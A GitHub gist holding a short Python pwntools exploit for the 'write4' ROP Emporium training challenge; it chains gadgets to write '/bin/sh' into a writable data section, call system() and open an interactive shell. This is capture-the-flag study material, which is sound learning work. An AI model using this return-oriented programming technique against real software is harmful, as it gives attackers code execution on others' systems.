Created
May 15, 2019 12:42
-
-
Save Sinkmanu/cc5d2995753e1dae250b2da0e7aa1a9a to your computer and use it in GitHub Desktop.
Exploit for write4 challenge of https://ropemporium.com/
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python | |
| from pwn import * | |
| context(arch = 'amd64', os = 'linux') | |
| elf = ELF("./write4") | |
| p = process(elf.path) | |
| #p = gdb.debug("/home/manu/Challenges/write4", ''' | |
| #break main | |
| #''') | |
| # 0x00400820 4d893e mov qword [r14], r15 | |
| # 0x00400823 c3 ret | |
| # 0x00400890 415e pop r14 | |
| # 0x00400892 415f pop r15 | |
| # 0x00400894 c3 ret | |
| # 0x00400893 5f pop rdi | |
| # 0x00400894 c3 ret | |
| # [25] .data PROGBITS 0000000000601050 00001050 | |
| # 0000000000000010 0000000000000000 WA 0 0 8 | |
| pop_rdi_ret = 0x00400893 | |
| mov_r14_r15 = 0x00400820 | |
| pop14_pop15_ret = 0x00400890 | |
| system = 0x4005e0 | |
| bin_sh = "/bin/sh\x00" | |
| data_section_writable = 0x601050 | |
| p.sendline("A"*40 + p64(pop14_pop15_ret) + p64(data_section_writable) + bin_sh + p64(mov_r14_r15) + p64(pop_rdi_ret) + p64(data_section_writable) + p64(system)) | |
| p.interactive() |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment